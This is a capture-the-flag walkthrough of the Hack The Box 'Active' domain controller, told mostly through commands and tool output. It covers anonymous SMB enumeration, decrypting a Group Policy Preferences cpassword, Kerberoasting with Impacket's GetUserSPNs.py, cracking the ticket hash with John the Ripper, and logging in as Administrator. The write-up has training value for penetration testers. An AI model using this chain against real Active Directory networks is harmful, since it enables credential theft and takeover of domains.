Active #2 AD

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.100

53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)

88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-23 06:40:22Z)

135/tcp   open  msrpc         Microsoft Windows RPC

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)

445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/23%OT=53%CT=1%CU=30244%PV=Y%DS=2%DC=I%G=Y%TM=658
OS:6813E%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S
OS:%TS=7)SEQ(SP=FE%GCD=1%ISR=10B%TI=I%CI=I%TS=7)SEQ(SP=FF%GCD=1%ISR=10C%TI=
OS:I%CI=I%II=I%SS=S%TS=7)OPS(O1=M53ANW8ST11%O2=M53ANW8ST11%O3=M53ANW8NNT11%
OS:O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)WIN(W1=2000%W2=2000%W3=2000%W4
OS:=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M53ANW8NNS%CC=N%Q=)T1(R
OS:=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%
OS:RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T
OS:6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-12-23T06:41:45
|_  start_date: 2023-12-23T06:31:12
|_clock-skew: -1s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.100 

53/udp   open          domain
88/udp   open          kerberos-sec
123/udp  open          ntp
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
389/udp  open          ldap
464/udp  open|filtered kpasswd5
500/udp  open|filtered isakmp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O -p- 10.10.10.100

Enumeration:

The nmap scan discloses the domain name of the machine to be active.htb. So we’ll edit the /etc/hosts file to map the machine’s IP address to the active.htb domain name.

┌──(kali💀kali)-[~]
└─$ sudo nano /etc/hosts     

10.10.10.100 active.htb

The first thing I’m going to try to enumerate is DNS. Let’s use nslookup to learn more information about this domain.

┌──(kali💀kali)-[~]
└─$ nslookup       
> 10.10.10.100 
** server can't find 100.10.10.10.in-addr.arpa: NXDOMAIN
> server 10.10.10.100 
Default server: 10.10.10.100
Address: 10.10.10.100#53

It doesn’t give us any information. Next, let’s attempt a zone transfer.

┌──(kali💀kali)-[~]
└─$ host -l active.htb 10.10.10.100
Using domain server:
Name: 10.10.10.100
Address: 10.10.10.100#53
Aliases: 

Host active.htb not found: 5(REFUSED)
; Transfer failed.

No luck there as well. I also tried dnsrecon and didn’t get anything useful. So we’ll move on to enumerating SMB on ports 139 and 445. We’ll start with viewing the SMB shares.

┌──(kali💀kali)-[~]
└─$ smbmap -H active.htb

[+] IP: 10.10.10.100:445        Name: active.htb                Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

The Replication share has READ ONLY permission on it. Let’s try to login anonymously to view the files of the Replication share.

┌──(kali💀kali)-[~]
└─$ smbclient //active.htb/Replication -N
Anonymous login successful

smb: \> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

-N: suppresses the password since we’re logging in anonymously

We’re in!

After looking through all the files on this share, I found a Groups.xml file in the following directory.

cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

A quick google search tells us that Groups.xml file is a Group Policy Preference (GPP) file. GPP was introduced with the release of Windows Server 2008 and it allowed for the configuration of domain-joined computers. A dangerous feature of GPP was the ability to save passwords and usernames in the preference files. While the passwords were encrypted with AES, the key was made publicly available.

[MS-GPPREF]: Password EncryptionMicrosoftLearn

Therefore, if you managed to compromise any domain account, you can simply grab the groups.xml file and decrypt the passwords.

Understanding Privilege Escalation via GPPwww.mindpointgroup.com

Now that we know how important this file is, let’s download it to our attack machine.

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

View the contents of the file.

┌──(kali💀kali)-[~/Desktop]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

name="active.htb\SVC_TGS" 
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

This will allow us to gain an initial foothold on the system.

Foothold:

As mentioned above, the password is encrypted with AES, which is a strong encryption algorithm. However, since the key is posted online, we can easily decrypt the encrypted password.

There’s a simple ruby program known as gpp-decrypt that uses the publicly disclosed key to decrypt any given GPP encrypted string. This program is included with the default installation of Kali.

Let’s use it to decrypt the password we found.

┌──(kali💀kali)-[~/Desktop]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

From the Groups.xml file, we know that the username is SVG_TGS. This probably is not the admin user, but regardless let’s try to access the ADMIN$ share with the username/password we found.

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -W active.htb -U SVC_TGS //active.htb/ADMIN$
Password for [ACTIVE.HTB\SVC_TGS]:
tree connect failed: NT_STATUS_ACCESS_DENIED

-W: domain -U: username

Nope, that doesn’t work.

Let’s try the USERS share.

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient -W active.htb -U SVC_TGS //active.htb/USERS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

We’re in!

Navigate to the directory that contains the user.txt flag.

smb: \> cd SVC_TGS\Desktop\
smb: \SVC_TGS\Desktop\> get user.txt

┌──(kali💀kali)-[~/Desktop]
└─$ cat user.txt     
3fba0-------------------------------

We compromised a low privileged user. Now we need to escalate privileges.

Privilege Escalation:

Since we’re working with Active Directory and using Kerberos as an authentication protocol, let’s try a technique known as Kerberoasting. To understand how this attack works, you need to understand how the Kerberos authentication protocol works.

LDAP / SSO Authentication (ig_ldap_sso_auth)docs.typo3.org

If you compromise a user that has a valid kerberos ticket-granting ticket (TGT), then you can request one or more ticket-granting service (TGS) service tickets for any Service Principal Name (SPN) from a domain controller. An example SPN would be the Application Server.

A portion of the TGS ticket is encrypted with the hash of the service account associated with the SPN. Therefore, you can run an offline brute force attack on the encrypted portion to reveal the service account password. Therefore, if you request an administrator account TGS ticket and the administrator is using a weak password, we’ll be able to crack it!

IMPACKET: root.txt

This includes a collection of Python classes for working with network protocols.

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

They have a script in the /examples folder called GetUserSPNs.py that is used to find SPNs that are associated with a given user account. It will output a set of valid TGSs it requested for those SPNs.

Run the script using the SVC_TGS credentials we found.

┌──(kali💀kali)-[~/impacket/examples]
└─$ ./GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.12.0.dev1+20231103.113049.2d00fc6a - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-12-23 01:32:18.802548             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$00e9b5606c0cacb1fa6218f47a5123be$1343821a3e7e0a27717960de5e7fd211226a445ed316b6011929f374f4e49b2911e408a6d7e0e0f02eaf75a3dd3d7a4c79ac30dce4c32b1000f3146ce3591262211524bdf9c980735b87bde1617fcd11c19530384b37642fff96a8a15e0aa9e508c5da3c0495d0fe17da1fc1d22241de63e8b508e14ca9c13ec7d44cdda814d755a9d365b88b9fa8251de907a6a20a7f02389afb71bff59e611ba3998dbd8a7d67a581e4868d08ee4752f1e7deada512a707283b0c3ac46227f2e3f89df52668016c8050595e2a9c5e793f0feb40ce690593cb5570fe37b81a3b1dca5c88f9e6415d89f6da52d60265bb6c83ea4c1160170c4f9095b633221261de0f6adce0048039a05d37d2a4d7cb98f43419d39d9c06c7169c5d68f56cafab1d28eda86e41498d67b41f61c5d00337d40375cbdc14f52fead29516807e9fbe870f6430835e11007bd555f81c73d7951662e762118c47abc5fd59dea92f466fde4c2ed4dcea9882947944331a042d442545e400c24b1733ab2b3649d6705b6dafb8461703f160083e44c9cf7a829a835e4e4331801d7ae82f22d54b4a63787e0a0afc6bbf98e9b652b98f227165a89d5c455b97b2be56168f8f25363319c121127238c0b80ccc5a4f1301289065ad49438f34a59c568b7ba5f58da31ffea4ce0aa1443c31d31612194dbd685aff802729837007465c55497030a8a5b3beb8c678b3ee6adefb4879085492e0129df967d1dbdb179741defdfb5cde116e118cf1a79d5b267e54de230a73abb4ddf214afe147d363774a0f08832b6b5c790ce4b0050269183a815ed98442438d3b9f217d558ebdc505ccd8f0b20830af75f25184db18bbd6a7dcbd2f61209a763cb6c7f94d5bd8fe4ca0b8ce1c3e63d040fa9a3d754d09b23b90216a37775de838462c64da1b14b9228fb77dde534ff7f2cd35597195c808395af318478a386924f50624ea5ac45204c3cb4382d864b8ad0fdc8263bc19ca89b0d9896cb8ae10e81c879a2d1f735abfbe3fa146a27cf00f97fe348c6d51633c6e5a9959b9db1bf21cb82812202cbeaa010375790171e5f0f6ddd7f454b3d19c8a24685872465c488ea0ac7d432f034ee77bc8422c0c35865a852582865db10e3a67ef5aea9e5a6b85933586e7223a5b03226d5283b667a5285d37414303f26eb8034a21545bfe89d93e05b1df6267cffd473ae97326792a80f11ed761ee7b6f7e70e90d10945e6c55596a1c7664239fe4c36096f80c24c9bd212b

target: domain/username:password -dc-ip: IP address of the domain controller -request: Requests TGS for users and outputs them in JtR/hashcat format

We were able to request a TGS from an Administrator SPN. If we can crack the TGS, we’ll be able to escalate privileges!

Note: If you get a “Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)”, it’s probably because the attack machine date and time are not in sync with the Kerberos server.

Now that we have a valid TGS that is already in John the Ripper format, let’s try to crack it.

┌──(kali💀kali)-[~/Desktop]
└─$ nano spn-admin.txt
                                                                                                
┌──(kali💀kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:03 DONE (2023-12-23 04:06) 0.2923g/s 3081Kp/s 3081Kc/s 3081KC/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We get back the password! Ticketmaster1968

To login as the administrator, we’ll use another Impacket script known as psexec.py. As shown in the help menu, you can run the script using the following command.

# psexec.py domain/username:password@targetName

┌──(kali💀kali)-[/opt/impacket-0.9.19/examples]
└─$ psexec.py active.htb/Administrator:Ticketmaster1968@active.htb

SMB: root.txt

┌──(kali💀kali)-[~/Desktop]
└─$ smbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968

[+] IP: 10.10.10.100:445        Name: active.htb                Status: ADMIN!!!   
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ, WRITE     Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ, WRITE     Logon server share 
        Users                                                   READ ONLY

┌──(kali💀kali)-[~/Desktop]
└─$ smbclient //10.10.10.100/C$ -U active.htb\\administrator%Ticketmaster1968

smb: \> get \users\administrator\desktop\root.txt

┌──(kali💀kali)-[~/Desktop]
└─$ cat '\users\administrator\desktop\root.txt'
f99d36------------------------------

PreviousForest #1 AD NextSauna #3 AD

Last updated 1 year ago